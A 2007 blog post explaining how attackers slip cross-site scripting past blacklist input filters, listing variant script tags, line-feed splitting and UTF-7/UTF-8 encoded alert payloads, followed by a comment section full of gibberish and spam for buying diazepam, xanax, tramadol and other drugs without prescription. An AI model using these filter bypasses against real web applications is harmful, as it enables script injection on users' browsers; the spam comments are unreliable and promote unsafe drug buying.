Friday
May042007
Defeating input filters for injection
Friday, May 4, 2007 at 11:58AM Especially malicious input in URLs will look suspicious to someonewho has heard of these attacks, or at least to a security scanner. So an attacker will try to hide suspicious parts from the victim or the security scanner. For a human being thiscan be as easy as displaying a tidy link as an image, but in fact the image is linked to a malicious URL. Or the malicious part can be hidden in a very long URL where it does notstrike. When it comes to automatic scanners, the attacker has to use different technologies. If the web applications filter does not remove all HTML tags fromthe input data, but uses a blacklist filter, the attacker might use the following alternatives to the <script> tag, which work in most web browsers:
- <<script> (if the scanner filters <script> and does comparison of the string inside the first matching bracket pairs)
- <scrscriptipt> (bypasses scanners that remove the word script)
- <script/src=... (bypasses scanners that look for <script> or <script xsrc=...)
- <script a=">" " xsrc=... (bypass a scanner which allows <script>, but not <script xsrc=...)
- or put a line feed after each character (works in Internet Explorer 6.0)
Another very effective way to hide angle brackets or other characters from a security scanner is to use a different character encoding that the web browser might be able to process,but the web application might not. There are a lot of possibilities to encode characters, but of course the browser has to be set to read the document in the encoding. If the encoding is set to Auto-Select in Internet Explorer andthere is an UTF-7 or -8 encoded string in the first 4096 bytes, it will automatically treat the document as UTF-7 or -8.
If the user has set this option and/or the web application does not send a default character encoding, as it is the case with Railsapplications by default, cryptic UTF-8 encoded strings like the following will pop up a message box, if injected.
<IMG xsrc=javascript
:alert('XSS
')>
And if the user has set his browser to UTF-7 encoding, injecting the following will pop up a message box. Note that it does not include any angle brackets, so it might bypassfilters that look for them.
+ADw-SCRIPT+AD4-alert('vulnerable');+ADw-/SCRIPT+AD4-
View Printer Friendly Version
Email Article to Friend
Reader Comments (249)
Quite interesting. Thank you for writing this up.
hbrcyvfi slhnia jcbh rkjmegnsh iszweo kiblyjq fzvxky
I have been looking for sites like this for a long time. Thank you!
This is
Adderall....
Phentermine....
Cialis....
Diazepam buy diazepam buy diazepam online pharmacy. Buy diazepam news....
Buy xanax without prescription in usa. Buy cheap xanax without prescription....
Phentermine diet pills. Phentermine diet pills di....
Valium liquid form....
Ultram. Canada pharmacy buy online ultram. Ultram tramadol. Ultram abuse. Side effects of ultram....
Ambien generic available. Generic ambien. Is there a generic form of ambien....
Generic ambien....
Duration of oral diazepam. Duration of diazepam. Diazepam onset and duration....
Adipexdrug addiction order phentermine online....
Buy tramadol online save wholesale price yep. Buy tramadol. Tramadol hci online buy cheap tramadol hci online....
Buy sublingual levitra online....
Viagra generic 25mg no prescription. Generic viagra. Generic lavitra offers an alternative to viagra....
Buy cialis online viagra cialis buy cialis online. Cialis best price buy online. Buy viagra online uk cialis levitra....